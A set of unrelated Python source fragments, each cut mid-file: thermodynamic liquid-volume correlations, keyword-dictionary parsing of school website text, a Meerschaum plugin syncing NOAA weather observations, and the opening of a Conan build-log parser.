elif method == CRC_INORG_L:
rho = CRC_inorganic(T, self.CRC_INORG_L_rho, self.CRC_INORG_L_k, self.CRC_INORG_L_Tm)
Vm = rho_to_Vm(rho, self.CRC_INORG_L_MW)
# elif method == VDI_PPDS:
# A, B, C, D = self.VDI_PPDS_coeffs
# tau = 1. - T/self.VDI_PPDS_Tc
# rho = self.VDI_PPDS_rhoc + A*tau**0.35 + B*tau**(2/3.) + C*tau + D*tau**(4/3.)
# Vm = rho_to_Vm(rho, self.VDI_PPDS_MW)
elif method == CRC_INORG_L_CONST:
Vm = self.CRC_INORG_L_CONST_Vm
elif method == COOLPROP:
Vm = 1./CoolProp_T_dependent_property(T, self.CASRN, 'DMOLAR', 'l')
elif method in self.tabular_data:
Vm = self.interpolate(T, method)
return Vm
def calculate_P(self, T, P, method):
r'''Method to calculate pressure-dependent liquid molar volume at
temperature `T` and pressure `P` with a given method.
This method has no exception handling; see `TP_dependent_property`
for that.
Parameters
----------
T : float
Temperature at which to calculate molar volume, [K]
P : float
Pressure at which to calculate molar volume, [K]
method : str
Name of the method to use
Returns
-------
Vm : float
Molar volume of the liquid at T and P, [m^3/mol]
'''
if method == COSTALD_COMPRESSED:
Vm = self.T_dependent_property(T)
Psat = self.Psat(T) if hasattr(self.Psat, '__call__') else self.Psat
Vm = COSTALD_compressed(T, P, Psat, self.Tc, self.Pc, self.omega, Vm)
elif method == COOLPROP:
Vm = 1./PropsSI('DMOLAR', 'T', T, 'P', P, self.CASRN)
elif method == EOS:
self.eos[0] = self.eos[0].to_TP(T=T, P=P)
Vm = self.eos[0].V_l
elif method in self.tabular_data:
Vm = self.interpolate_P(T, P, method)
return Vm
def test_method_validity(self, T, method):
r'''Method to check the validity of a method. Follows the given
ranges for all coefficient-based methods. For CSP methods, the models
are considered valid from 0 K to the critical point. For tabular data,
extrapolation outside of the range is used if
:obj:`tabular_extrapolation_permitted` is set; if it is, the extrapolation
is considered valid for all temperatures.
It is not guaranteed that a method will work or give an accurate
prediction simply because this method considers the method valid.
**BHIRUD_NORMAL** behaves poorly at low temperatures and is not used
under 0.35Tc. The constant value available for inorganic chemicals,
from method **CRC_INORG_L_CONST**, is considered valid for all
temperatures.
Parameters
----------
T : float
Temperature at which to test the method, [K]
method : str
Name of the method to test
Returns
-------
validity : bool
Whether or not a method is valid
'''
validity = True
if method == PERRYDIPPR:
if T < self.DIPPR_Tmin or T > self.DIPPR_Tmax:
validity = False
elif method == VDI_PPDS:
validity = T <= self.VDI_PPDS_Tc
elif method == CRC_INORG_L:
if T < self.CRC_INORG_L_Tm or T > self.CRC_INORG_L_Tmax:
validity = False
elif method == COOLPROP:
if T < self.CP_f.Tmin or T < self.CP_f.Tt or T > self.CP_f.Tc:
return False
elif method in [RACKETT, YAMADA_GUNN, TOWNSEND_HALES,
HTCOSTALD, YEN_WOODS_SAT, MMSNM0, MMSNM0FIT,
CAMPBELL_THODOS, HTCOSTALDFIT, RACKETTFIT]:
if T >= self.Tc:
validity = False
elif method == BHIRUD_NORMAL:
if T/self.Tc < 0.35:
validity = False
# Has bad interpolation behavior lower than roughly this
elif method == CRC_INORG_L_CONST:
pass # Weird range, consider valid for all conditions
elif method in self.tabular_data:
# if tabular_extrapolation_permitted, good to go without checking
if not self.tabular_extrapolation_permitted:
Ts, properties = self.tabular_data[method]
if T < Ts[0] or T > Ts[-1]:
validity = False
else:
raise Exception('Method not valid')
return validity
def test_method_validity_P(self, T, P, method):
r'''Method to check the validity of a high-pressure method. For
**COOLPROP**, the fluid must be both a liquid and under the maximum
pressure of the fluid's EOS. **COSTALD_COMPRESSED** is considered
valid for all values of temperature and pressure. However, it very
often will not actually work, due to the form of the polynomial in
terms of Tr, the result of which is raised to a negative power.
For tabular data, extrapolation outside of the range is used if
:obj:`tabular_extrapolation_permitted` is set; if it is, the
extrapolation is considered valid for all temperatures and pressures.
It is not guaranteed that a method will work or give an accurate
prediction simply because this method considers the method valid.
Parameters
----------
T : float
Temperature at which to test the method, [K]
P : float
Pressure at which to test the method, [Pa]
method : str
Name of the method to test
Returns
-------
validity : bool
Whether or not a method is valid
'''
validity = True
if method == COSTALD_COMPRESSED:
pass
elif method == COOLPROP:
validity = PhaseSI('T', T, 'P', P, self.CASRN) == 'liquid'
elif method == EOS:
self.eos[0] = self.eos[0].to_TP(T=T, P=P)
validity = hasattr(self.eos[0], 'V_l')
elif method in self.tabular_data:
if not self.tabular_extrapolation_permitted:
Ts, Ps, properties = self.tabular_data[method]
if T < Ts[0] or T > Ts[-1] or P < Ps[0] or P > Ps[-1]:
validity = False
else:
raise Exception('Method not valid')
return validity
def COSTALD_compressed(T, P, Psat, Tc, Pc, omega, Vs):
r'''Calculates compressed-liquid volume, using the COSTALD [1]_ CSP
method and a chemical's critical properties.
The molar volume of a liquid is given by:
.. math::
V = V_s\left( 1 - C \ln \frac{B + P}{B + P^{sat}}\right)
\frac{B}{P_c} = -1 + a\tau^{1/3} + b\tau^{2/3} + d\tau + e\tau^{4/3}
e = \exp(f + g\omega_{SRK} + h \omega_{SRK}^2)
C = j + k \omega_{SRK}
Parameters
----------
T : float
Temperature of fluid [K]
P : float
Pressure of fluid [Pa]
Psat : float
Saturation pressure of the fluid [Pa]
Tc : float
Critical temperature of fluid [K]
Pc : float
Critical pressure of fluid [Pa]
omega : float
(ideally SRK) Acentric factor for fluid, [-]
This parameter is alternatively a fit parameter.
Vs : float
Saturation liquid volume, [m^3/mol]
Returns
-------
V_dense : float
High-pressure liquid volume, [m^3/mol]
Notes
-----
Original equation was in terms of density, but it is converted here.
The example is from DIPPR, and exactly correct.
This is DIPPR Procedure 4C: Method for Estimating the Density of Pure
Organic Liquids under Pressure.
Examples
--------
>>> COSTALD_compressed(303., 9.8E7, 85857.9, 466.7, 3640000.0, 0.281, 0.000105047)
9.287482879788506e-05
References
----------
.. [1] <NAME>., <NAME>, and <NAME>. "An Improved
Correlation for Densities of Compressed Liquids and Liquid Mixtures."
AIChE Journal 28, no. 4 (July 1, 1982): 671-76. doi:10.1002/aic.690280420
'''
a = -9.070217
b = 62.45326
d = -135.1102
f = 4.79594
g = 0.250047
h = 1.14188
j = 0.0861488
k = 0.0344483
tau = 1 - T/Tc
e = exp(f + g*omega + h*omega**2)
C = j + k*omega
B = Pc*(-1 + a*tau**(1/3.) + b*tau**(2/3.) + d*tau + e*tau**(4/3.))
return Vs*(1 - C*log((B + P)/(B + | |
open(file,'r') as infile:
var = json.load(infile)
if file.lower().endswith(".pickle"):
with open(file,'rb') as infile:
var = pickle.load(infile)
print(file + " successfully loaded!")
return var
def load_dict(custom_dict, file_path):
"""Loads in a dictionary. Adds each entry from the dict at file_path to the defined set custom_dict (the input),
which can also be an existing dictionary. This allows the creation of combined dictionaries!"""
with open(file_path) as file_handler:
line = file_handler.readline()
while line:
custom_dict.add(stemmer.stem(line.replace("\n", ""))) # Add line after stemming dictionary entries and eliminating newlines
line = file_handler.readline() # Look for anything else in that line, add that too
return custom_dict
def list_files(folder_path, extension):
"""Outputs a list of every file in folder_path or its subdirectories that has a specified extension.
Prepends specified extension with '.' if it doesn't start with it already.
If no extension is specified, it just returns all files in folder_path."""
matches = []
if extension:
extension = str(extension) # Coerce to string, just in case
if extension and not extension.startswith("."):
extension = "." + extension
for dirpath,dirnames,filenames in os.walk(folder_path):
if extension:
for filename in fnmatch.filter(filenames, "*" + extension): # Use extension to filter list of files
matches.append(os.path.join(dirpath,filename))
else:
matches.append(os.path.join(dirpath,filename)) # If no extension, just take all files
return matches
def has_html(folder_path):
"""Simple function that counts .html files and returns a binary:
'True' if a specified folder has any .html files in it, 'False' otherwise."""
html_list = []
for dirpath,dirnames,filenames in os.walk(folder_path):
for file in fnmatch.filter(filenames, "*.html"): # Check if any HTML files in folder_path
html_list.append(file)
if len(html_list)==0:
return False
else:
return True
def convert_df(df):
"""Makes a Pandas DataFrame more memory-efficient through intelligent use of Pandas data types:
specifically, by storing columns with repetitive Python strings not with the object dtype for unique values
(entirely stored in memory) but as categoricals, which are represented by repeated integer values. This is a
net gain in memory when the reduced memory size of the category type outweighs the added memory cost of storing
one more thing. As such, this function checks the degree of redundancy for a given column before converting it."""
converted_df = pd.DataFrame() # Initialize DF for memory-efficient storage of strings (object types)
# TO DO: Infer dtypes of df
df_obj = df.select_dtypes(include=['object']).copy() # Filter to only those columns of object data type
for col in df.columns:
if col in df_obj:
num_unique_values = len(df_obj[col].unique())
num_total_values = len(df_obj[col])
if (num_unique_values / num_total_values) < 0.5: # Only convert data types if at least half of values are duplicates
converted_df.loc[:,col] = df[col].astype('category') # Store these columns as dtype "category"
else:
converted_df.loc[:,col] = df[col]
else:
converted_df.loc[:,col] = df[col]
converted_df.select_dtypes(include=['float']).apply(pd.to_numeric,downcast='float')
converted_df.select_dtypes(include=['int']).apply(pd.to_numeric,downcast='signed')
return converted_df
# ### Set parsing keywords
keywords = ['values', 'academics', 'skills', 'purpose',
'direction', 'mission', 'vision', 'vision', 'mission', 'our purpose',
'our ideals', 'ideals', 'our cause', 'curriculum','curricular',
'method', 'pedagogy', 'pedagogical', 'approach', 'model', 'system',
'structure','philosophy', 'philosophical', 'beliefs', 'believe',
'principles', 'creed', 'credo', 'values','moral', 'history', 'our story',
'the story', 'school story', 'background', 'founding', 'founded',
'established','establishment', 'our school began', 'we began',
'doors opened', 'school opened', 'about us', 'our school', 'who we are',
'our identity', 'profile', 'highlights']
mission_keywords = ['mission','vision', 'vision:', 'mission:', 'our purpose', 'our ideals', 'ideals:', 'our cause', 'cause:', 'goals', 'objective']
curriculum_keywords = ['curriculum', 'curricular', 'program', 'method', 'pedagogy', 'pedagogical', 'approach', 'model', 'system', 'structure']
philosophy_keywords = ['philosophy', 'philosophical', 'beliefs', 'believe', 'principles', 'creed', 'credo', 'value', 'moral']
history_keywords = ['history', 'story','our story', 'the story', 'school story', 'background', 'founding', 'founded', 'established', 'establishment', 'our school began', 'we began', 'doors opened', 'school opened']
about_keywords = ['about us', 'our school', 'who we are', 'overview', 'general information', 'our identity', 'profile', 'highlights']
mission_keywords = set(stemmer.stem(word) for word in mission_keywords)
curriculum_keywords = set(stemmer.stem(word) for word in curriculum_keywords)
philosophy_keywords = set(stemmer.stem(word) for word in philosophy_keywords)
history_keywords = set(stemmer.stem(word) for word in history_keywords)
about_keywords = set(stemmer.stem(word) for word in about_keywords)
all_keywords = set(stemmer.stem(key) for key in keywords)
logging.info("List of keywords:\n" + str(list(all_keywords)))
# ### Create dictionaries for each ideology and one for combined ideologies
ess_dict, prog_dict, rit_dict, all_ideol, all_dicts = set(), set(), set(), set(), set()
all_ideol = load_dict(all_ideol, dicts_dir + "ess_dict.txt")
all_ideol = load_dict(all_ideol, dicts_dir + "prog_dict.txt") # For complete ideological list, append second ideological dict
all_dicts = load_dict(all_ideol, dicts_dir + "rit_dict.txt") # For complete dict list, append ritual dict terms too
ess_dict = load_dict(ess_dict, dicts_dir + "ess_dict.txt")
prog_dict = load_dict(prog_dict, dicts_dir + "prog_dict.txt")
rit_dict = load_dict(rit_dict, dicts_dir + "rit_dict.txt")
logging.info(str(len(all_ideol)) + " entries loaded into the combined ideology dictionary.")
list_dict = list(all_ideol)
list_dict.sort(key = lambda x: x.lower())
logging.info("First 10 elements of combined ideology dictionary are:\n" + str(list_dict[:10]))
# Create tuples for keyword lists and dictionary terms:
keys_tuple = tuple([mission_keywords,curriculum_keywords,philosophy_keywords,history_keywords,about_keywords,\
all_ideol,all_keywords])
dicts_tuple = tuple([ess_dict,prog_dict,rit_dict,all_dicts])
logging.info(str(list(keys_tuple)))
logging.info(str(list(dicts_tuple)))
# ### Define dictionary matching helper functions
def dict_count(text_list, custom_dict):
"""Performs dictionary analysis, returning number of dictionary hits found.
Removes punctuation and stems the phrase being analyzed.
Compatible with multiple-word dictionary elements."""
counts = 0 # number of matches between text_list and custom_dict
dictless_list = [] # Updated text_list with dictionary hits removed
max_entry_length = max([len(entry.split()) for entry in custom_dict]) # Get length (in words) of longest entry in combined dictionary
for chunk in text_list: # chunk may be several sentences or possibly paragraphs long
chunk = re.sub(r'[^\w\s]', '', chunk) # Remove punctuation with regex that keeps only letters and spaces
# Do dictionary analysis for word chunks of lengths max_entry_length down to 1, removing matches each time.
# This means longer dict entries will get removed first, useful in case they contain smaller entries.
for length in range(max_entry_length, 0, -1):
dictless_chunk,len_counts = dict_match_len(chunk,custom_dict,length)
dictless_list.append(dictless_chunk)
counts += len_counts
return dictless_list,int(counts)
def dict_match_len(phrase, custom_dict, length):
"""Helper function to dict_match.
Returns # dictionary hits and updated copy of phrase with dictionary hits removed.
Stems phrases before checking for matches."""
hits_indices, counts = [], 0
splitted_phrase = phrase.split()
if len(splitted_phrase) < length:
return phrase, 0 # If text chunk is shorter than length of dict entries being matched, don't continue.
for i in range(len(splitted_phrase) - length + 1):
to_stem = ""
for j in range(length):
to_stem += splitted_phrase[i+j] + " " # Builds chunk of 'length' words
stemmed_word = stemmer.stem(to_stem[:-1]) # stem chunk
if stemmed_word in custom_dict:
hits_indices.append(i) # Store the index of the word that has a dictionary hit
counts += 1
logging.info(stemmed_word)
# Iterate through list of matching word indices and remove the matches
for i in range(len(hits_indices)-1, -1, -1):
splitted_phrase = splitted_phrase[:hits_indices[i]] + \
splitted_phrase[hits_indices[i] + length:]
modified_phrase = ""
for sp in splitted_phrase: # Rebuild the modified phrase, with matches removed
modified_phrase += sp + " "
return modified_phrase[:-1], counts
@timeout_decorator.timeout(20, use_signals=False)
def dictmatch_file_helper(file,dictsnames_biglist,all_keywords,all_ideol,all_matches):
"""Counts number of matches in file for each list of terms given, and also collects the terms not matched.
Dictsnames_biglist is a list of lists, each list containing:
a list of key terms, currently essentialism, progressivism, ritualism, and all three combined (ess_dict, prog_dict, rit_dict, all_dicts);
the variables used to store the number of matches for each term lit (ess_count, prog_count, rit_count, alldict_count);
and the not-matches--that is, the list of words leftover from the file after all matches are removed (ess_dictless, prog_dictless, rit_dictless, alldict_dictless). """
for i in range(len(dictsnames_biglist)): # Iterate over dicts to find matches with parsed text of file
# Dicts are: (ess_dict, prog_dict, rit_dict, alldict_count); count_names are: (ess_count, prog_count, rit_count, alldict_count); dictless_names are: (ess_dictless, prog_dictless, rit_dictless, alldict_dictless)
# adict,count_name,dictless_name = dictsnames_tupzip[i]
dictless_add,count_add = dict_count(parsed_pagetext,dictsnames_biglist[i][0])
dictsnames_biglist[i][1] += count_add
dictsnames_biglist[i][2] += dictless_add
all_matches += count_add
logging.info("Discovered " + str(count_add) + " matches for " + str(file) + ", a total thus far of " + str(dictsnames_biglist[i][1]) + " matches...")
return dictsnames_biglist,all_matches
# ### Define parsing helper functions
@timeout_decorator.timeout(20, use_signals=False)
def parse_file_helper(file,webtext,keywords_text,ideology_text):
"""Parses file into (visible) webtext, both complete and filtered by terms in 'keywords' and 'ideology' lists."""
parsed_pagetext = []
parsed_pagetext = parsefile_by_tags(file) # Parse page text
if len(parsed_pagetext) == 0: # Don't waste time adding empty pages
logging.warning(" Nothing to parse in " + str(file) + "!")
else:
webtext.extend(parsed_pagetext) # Add new parsed | |
<reponame>bmeares/noaa
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
"""
Example script for syncing NOAA weather data
"""
from __future__ import annotations
from meerschaum.utils.typing import SuccessTuple, Dict, List, Any, Optional
__version__ = '1.2.4'
required = [
'requests', 'pytz',
]
def register(pipe: 'meerschaum.Pipe') -> Dict[str, Any]:
"""
Prompt the user for stations when registering new pipes.
"""
stations = ask_for_stations(pipe)
return {
'columns': {'datetime': 'timestamp', 'id': 'station',},
'noaa': {'stations': stations,},
}
def ask_for_stations(pipe, debug: bool = False) -> Dict[str, Any]:
"""
Prompt the user for stations and return a dictionary.
"""
import requests, json, re
from meerschaum.utils.warnings import warn, info
from meerschaum.utils.prompt import yes_no, prompt
from meerschaum.utils.formatting import pprint
instructions = f"""
Visit https://www.weather.gov and use the local forecast search tool
on the top left to find specific station IDs (e.g. 'KATL' for Atanta).
To fetch all stations from a state, enter the state abbreviation
(e.g. 'GA' for Georgia).
"""
info(instructions)
stations = dict()
while True:
stationID = prompt("Enter station ID or state abbreviation, empty to stop: ", icon=False)
if stationID == '': break
if len(stationID) == 2:
state_abbrev = stationID
if yes_no(
f"Are you sure you want to fetch from all stations in the state '{state_abbrev}'? " +
"This will be very slow!"
):
stations = get_state_stations(state_abbrev)
break
url = f"https://api.weather.gov/stations/{stationID}"
info = json.loads(requests.get(url).text)
try:
geo = info['geometry']
except:
geo = None
try:
name = info['properties']['name'].rstrip()
except:
warn(f"Unable to fetch name for station '{stationID}'. Skipping...", stack=False)
continue
if not yes_no(f"Is '{name}' a good label for station '{stationID}'?"):
name = prompt(f"New label for station '{stationID}': ", icon=False)
stations[stationID] = dict()
stations[stationID]['name'] = name
if geo is not None: stations[stationID]['geometry'] = geo
pprint(stations)
if not yes_no(f"Would you like to register the above stations to pipe '{pipe}'?"):
print("Resetting stations and starting over...")
pipe.parameters['noaa']['stations'] = dict()
return ask_for_stations(pipe, debug=debug)
return stations
def get_stations(
pipe: 'meerschaum.Pipe',
debug: bool = False
) -> Dict[str, Any]:
try:
return pipe.parameters['noaa']['stations']
except Exception as e:
return None
def get_state_stations(
state_abbrev : str,
debug : bool = False
) -> dict:
"""
Parse every station in a state
"""
from meerschaum.utils.warnings import warn
import requests, json
url = f"https://api.weather.gov/stations"
stations = dict()
print(f"Retrieving stations for state '{state_abbrev}'...")
d = json.loads(requests.get(url, params={'state' : state_abbrev}).text)
if 'features' not in d:
warn(f"No stations retrieved for state '{state_abbrev}'.", stack=False)
return stations
for f in d['features']:
stationID = None
try:
stationID = f['id'].split('/stations/')[-1]
geo = f.get('geometry', None)
name = f['properties']['name'].lstrip().rstrip()
except:
if stationID is not None:
warn(f"Could not determine name for station '{stationID}'. Skipping...")
continue
stations[stationID] = dict()
stations[stationID]['name'] = name
stations[stationID]['geometry'] = geo
return stations
def sync(
pipe: 'meerschaum.Pipe',
debug: bool = False,
blocking: bool = True,
workers: Optional[int] = None,
**kw
) -> SuccessTuple:
"""
Fetch JSON data from NOAA and sync it into a Pipe.
Overrides the default Meerschaum sync function.
"""
from multiprocessing.pool import ThreadPool
from meerschaum.utils.debug import dprint
from meerschaum.utils.warnings import warn, info
### Specify the columns in case Pipe is not registered.
### NOTE: Normally the Pipe's columns' types are determined by the first dataframe encountered.
### In this script, we cast everything to floats to avoid integers.
if not pipe.columns:
pipe.columns = {
"datetime" : "timestamp",
"id" : "station",
}
pipe.edit(interactive=False, debug=debug)
### dictionary of NOAA weather stations and names
stations = get_stations(pipe, debug=debug)
if workers is None:
workers = int(len(stations) / 2) + 1
### Fetch data from the stations.
try:
pool = ThreadPool(workers)
except Exception as e:
print(e)
pool = None
args = [(stationID, info, pipe) for stationID, info in stations.items()]
dataframes = (
dict(pool.starmap(do_fetch, args)) if pool is not None
else dict([do_fetch(*a) for a in args])
)
if pool is not None:
pool.close()
pool.join()
### only keep the common columns (skipping empty dataframes)
common_cols = None
for stationID, df in dataframes.items():
if df is None: continue
# print(df)
if len(df.columns) == 0: continue
# df.rename(columns=(lambda x : x.lstrip().rstrip()), inplace=True)
if common_cols is None:
common_cols = list(set(df.columns))
continue
try:
common_cols = list(set(common_cols) & set(df.columns))
except Exception as e:
warn(str(e))
### Make empty set in case all dataframes are empty.
if common_cols is None: common_cols = list()
### Pandas needs the columns to be in the same order, so sort the columns.
common_cols.sort()
### Cast all but these columns to floats.
non_float_cols = sorted(list({'label', 'timestamp', 'station', 'location', 'geometry'}))
float_cols = sorted(list(set(common_cols) - set(non_float_cols)))
### Cast the value columns to floats to avoid integers.
_dataframes = dict()
for stationID, df in dataframes.items():
if df is not None:
try:
### Only keep commons columns and ensure they are sorted.
if debug:
dprint(f"Common columns: {common_cols}")
df = df[common_cols]
df[float_cols] = df[float_cols].astype('float')
except Exception as e:
if debug:
warn(str(e))
warn(
f"Unable to parse data from station '{stationID}' " +
f"({stations[stationID]['name']})",
stack = False
)
df = None
_dataframes[stationID] = df
dataframes = _dataframes
### Make sure Pipe exists.
### Normally this is handled when syncing for the first time, but threading breaks things.
if not pipe.exists(debug=debug):
for stationID, df in dataframes.items():
if df is not None:
if len(df) > 0:
pipe.sync(df.head(1), force=True, debug=debug)
break
### Finally, time to sync the dataframes.
### pipe.sync returns a tuple of success bool and message.
### E.g. (True, "Success") or (False, "Error message")
success_dict = dict()
for stationID, df in dataframes.items():
info(f"Syncing data from station '{stationID}' ({stations[stationID]['name']})...")
kw.update({
'blocking' : blocking, 'workers' : workers, 'debug' : debug,
})
success = pipe.sync(df, **kw)[0] if df is not None else False
success_dict[stationID] = success
succeeded, failed = 0, 0
for stationID, success in success_dict.items():
if not success:
warn(
f"Failed to sync from station '{stationID}' ({stations[stationID]['name']})",
stack = False
)
failed += 1
else:
succeeded += 1
return (succeeded > 0), f"Synced from {succeeded + failed} stations, {failed} failed."
def do_fetch(
stationID : str,
info : dict,
pipe : 'meerschaum.Pipe'
) -> Tuple[str, Optional[Dict[str, List[Any]]]]:
"""
Wrapper for fetch_station_data (below)
"""
from meerschaum.utils.warnings import warn
try:
df = fetch_station_data(stationID, info, pipe)
except Exception as e:
msg = str(e)
warn(f"Failed to sync station '{stationID}' ({info['name']}). Error:\n{msg}")
df = None
return stationID, df
def fetch_station_data(
stationID : str,
info : dict,
pipe : meerschaum.Pipe
) -> Optional[Dict[str, List[Any]]]:
"""
Fetch JSON for a given stationID from NOAA and parse into a dataframe
"""
from meerschaum.utils.packages import import_pandas
from meerschaum.utils.misc import parse_df_datetimes
from meerschaum.utils.warnings import warn
import json, pytz, datetime, requests
pd = import_pandas()
### Get the latest sync time for this station so we don't request duplicate data.
try:
start = (
pipe.get_sync_time(
{ "station" : stationID }
) - datetime.timedelta(hours=24)
).replace(
tzinfo = pytz.timezone('UTC')
).isoformat()
except Exception as e:
start = None
### fetch JSON from NOAA since the start time (sync_time for this stationID)
if start:
print(
f"Fetching data newer than {start} for station '{stationID}' ({info['name']})...",
flush = True
)
else:
print(
f"Fetching all possible data for station '{stationID}' ({info['name']})...",
flush = True
)
url = f"https://api.weather.gov/stations/{stationID}/observations/"
response = None
try:
response = requests.get(url, params={"start":start})
data = json.loads(response.text)
except Exception as e:
print(f"\nFailed to parse JSON with exception: {e}", flush=True)
if response is not None:
print("Received text:\n" + response.text)
return None
print(f"Done fetching data for station '{stationID}' ({info['name']}).", flush=True)
### build a dictionary from the JSON response (flattens JSON)
d = dict()
if 'features' not in data:
warn(
f"Failed to fetch data for station '{stationID}' ({info['name']}):\n" + str(data),
stack = False
)
return None
for record in data['features']:
properties = record['properties']
if 'location' not in d:
d['location'] = []
d['location'].append(info['name'])
if 'geometry' not in d:
d['geometry'] = []
geo = None
if 'geometry' in info:
geo = json.dumps(info['geometry'])
d['geometry'].append(geo)
for col, v in properties.items():
### Specific to this API; filter out features we don't want.
if not v:
continue
### At this point, the timestamp is a string.
### It will get casted below in `parse_df_datetimes`.
if col == 'timestamp':
val = v
### We could just use the stationID provided, but it's given in the JSON
### so we might as well | |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import argparse
import logging
import os
import platform
import re
import sys
import tempfile
from collections import defaultdict
from contextlib import suppress
from functools import partial
from io import StringIO
from itertools import chain
from operator import itemgetter
from pathlib import Path
from subprocess import PIPE
from textwrap import indent
from typing import (
Any,
Callable,
Dict,
Iterable,
Iterator,
List,
Match,
Optional,
Set,
TextIO,
Tuple,
Type,
cast,
)
from psutil import Popen, Process
from . import __version__
from . import conan
from . import json
from .buildmon import BuildMonitor
from .conan import LOG as CONAN_LOG
from .logging import (
UniqueLogger,
get_logger,
init as initialize_logging,
level_from_name,
logger_escape_code,
)
from .regex import (
DECOLORIZE_REGEX,
REF_REGEX,
compact_pattern,
filter_by_regex,
shorten_conan_path,
)
from .utils import (
ProcessStreamHandler,
ScreenWriter,
StrictConfigParser,
added_first,
get_terminal_width,
shorten,
unique,
)
from .warnings import (
LOG as BLOG,
Regex,
levelname_from_severity,
warnings_from_matches,
)
CONMON_LOG = get_logger("CONMON")
CONAN_LOG_ONCE = UniqueLogger(CONAN_LOG)
PARENT_PROCS = [parent.name() for parent in Process(os.getppid()).parents()]
LOG_HINTS: Dict[str, None] = {}
def filehandler(key: str, mode="w", hint="") -> TextIO:
path = conan.conmon_setting(key)
if isinstance(path, str):
Path(path).parent.mkdir(parents=True, exist_ok=True)
if hint:
LOG_HINTS.setdefault(f"saved {hint} to {path!r}")
elif hint:
env_key = f"CONMON_{key.upper()}"
hint_path = key.replace("_", ".")
fmt = "export {}={}"
for name in PARENT_PROCS:
if name == "bash":
break
if name == "powershell.exe":
fmt = "$env:{}='{}'"
break
if name == "cmd.exe":
fmt = "set {}={}"
break
template = f"hint: execute {fmt!r} to save {{}}"
LOG_HINTS.setdefault(template.format(env_key, hint_path, hint))
return open(path or os.devnull, mode=mode, encoding="utf-8")
class State:
def __init__(self, parser: "ConanParser"):
self.finished = False
self.stopped = False
self.screen = parser.screen
def deactivate(self):
assert self.finished is False
self._deactivate(final=False)
assert self.finished is True
def _deactivate(self, final=False):
self.finished = True
self.stopped = final
def activated(self, parsed_line: Match) -> bool:
raise NotImplementedError
def process(self, parsed_line: Match) -> None:
raise NotImplementedError
class StateMachine:
def __init__(self, parser: "ConanParser"):
self.screen = parser.screen
self.parser = parser
self._active: Set[State] = set() # currently active
self._running: List[State] = [] # can be executed
self._default: Optional[State] = None
def add(self, state: State):
assert not state.stopped
assert state not in self.running_instances()
self._running.append(state)
return state
def setdefault(self, state: Optional[State]):
self._default = state
if state:
self.add(state)
@property
def active_classes(self) -> Tuple[Type[State], ...]:
return tuple(type(instance) for instance in self._active)
def active_instance(self) -> Optional[State]:
for state in self._active:
return state
return None
def running_instances(self) -> Tuple[State, ...]:
return tuple(self._running)
def activate(self, state: State):
state.finished = False
self._active.add(state)
def deactivate(self, state: State):
if not state.finished:
state.deactivate()
self._active.remove(state)
if state.stopped:
self._running.remove(state)
def deactivate_all(self):
for state in tuple(self._active):
self.deactivate(state)
def process_hooks(self, parsed_line: Match) -> None:
activated = []
for state in tuple(self._active):
if not state.finished:
state.process(parsed_line)
if state.finished:
self.deactivate(state)
for state in tuple(self._running):
if state not in self._active and state.activated(parsed_line):
activated.append(state)
if activated:
if len(activated) > 1:
CONMON_LOG.warning(
"overlapping states: %s",
", ".join(type(state).__name__ for state in activated),
)
self.deactivate_all()
for state in activated:
self.activate(state)
if not self._active and self._default and not self._default.stopped:
self.activate(self._default)
self._default.process(parsed_line)
class Default(State):
def __init__(self, parser: "ConanParser"):
super().__init__(parser)
self.parser = parser
self.overwrite = False
self.last_ref = None
def activated(self, parsed_line: Match) -> bool:
return False
def process(self, parsed_line: Match) -> None:
line, ref, rest = parsed_line.group(0, "ref", "rest")
match = re.fullmatch(r"Downloading conan\w+\.[a-z]{2,3}", line)
if rest.startswith("Installing (downloading, building) binaries..."):
self.overwrite = True
if match:
log = self.parser.getdefaultlog(self.last_ref)
self.screen.print(f"{match.group()} for {self.last_ref} ", overwrite=True)
elif ref:
self.last_ref = ref
log = self.parser.getdefaultlog(ref)
self.screen.print(f"{line} ", overwrite=True)
else:
log = self.parser.log
self.screen.print(f"{line} ", overwrite=self.overwrite)
log.setdefault("stdout", []).append(line)
self.deactivate()
class Requirements(State):
def __init__(self, parser: "ConanParser"):
super().__init__(parser)
self.log = parser.log.setdefault("requirements", defaultdict(dict))
self.stdout = parser.log.setdefault("stdout", [])
pattern, flags = compact_pattern(REF_REGEX)
self.regex = re.compile(
rf" +{pattern} from (?P<remote>'?[\w\- ]+'?) +- +(?P<status>\w+)", flags
)
self.req: List[Dict[str, Optional[str]]] = []
self.indent_ref = 0
def activated(self, parsed_line: Match) -> bool:
full_line, line = parsed_line.group(0, "rest")
if line in {"Requirements", "Build requirements"}:
self.screen.print(line)
self.stdout.append(full_line)
return True
return False
def process(self, parsed_line: Match) -> None:
line = parsed_line.group(0)
match = self.regex.match(line)
if not match:
self.deactivate()
return
self.req.append(match.groupdict())
self.stdout.append(line)
mapping = {
key: value
for key, value in match.groupdict().items()
if key not in {"ref", "status"}
}
name = mapping.pop("name")
self.log.setdefault(name, {}).update(mapping)
def _deactivate(self, final=False):
self.indent_ref = max(
[self.indent_ref, *(len(item["ref"]) for item in self.req)]
)
for item in sorted(self.req, key=itemgetter("status", "remote", "ref")):
self.screen.print(
f" {item['status']:^10} {item['ref']:{self.indent_ref}} from "
f"{item['remote']}"
)
self.req.clear()
super()._deactivate(final=False)
class Packages(State):
def __init__(self, parser: "ConanParser"):
super().__init__(parser)
self.log = parser.log.setdefault("requirements", defaultdict(dict))
self.stdout = parser.log.setdefault("stdout", [])
pattern, flags = compact_pattern(REF_REGEX)
self.regex = re.compile(
rf" +{pattern}:(?P<package_id>[a-z0-9]+) +- +(?P<status>\w+)", flags
)
self.pkg: List[Dict[str, Optional[str]]] = []
self.indent_ref = 0
def activated(self, parsed_line: Match) -> bool:
full_line, line = parsed_line.group(0, "rest")
if line in {"Packages", "Build requirements packages"}:
self.screen.print(line)
self.stdout.append(full_line)
return True
return False
def process(self, parsed_line: Match) -> None:
line = parsed_line.group(0)
match = self.regex.match(line)
if not match:
self.deactivate()
return
self.pkg.append(match.groupdict())
self.stdout.append(line)
name, package_id = match.group("name", "package_id")
self.log.setdefault(name, {}).update(
dict(package_id=package_id, package_revision=None)
)
def _deactivate(self, final=False):
self.indent_ref = max(
[self.indent_ref, *(len(item["ref"]) for item in self.pkg)]
)
for item in sorted(self.pkg, key=itemgetter("status", "ref")):
self.screen.print(
f" {item['status']:^10} {item['ref']:{self.indent_ref}} {item['package_id']}"
)
self.pkg.clear()
super()._deactivate(final=False)
class Config(State):
